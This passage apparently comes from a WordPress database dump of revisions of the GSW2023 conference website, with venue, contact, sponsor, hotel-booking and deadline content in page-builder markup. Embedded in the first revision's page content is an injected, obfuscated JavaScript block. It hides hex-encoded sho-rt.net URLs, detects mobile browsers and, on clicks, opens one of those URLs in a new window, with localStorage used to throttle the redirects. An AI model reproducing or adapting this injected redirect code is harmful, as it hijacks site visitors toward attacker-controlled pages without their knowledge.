Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-03 11:27:40','2023-06-03 11:27:40','',3066,'https://gsw2023.com/?p=4625',0,'revision','',0),
(4626,1,'2023-06-03 11:30:48','2023-06-03 11:30:48','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: 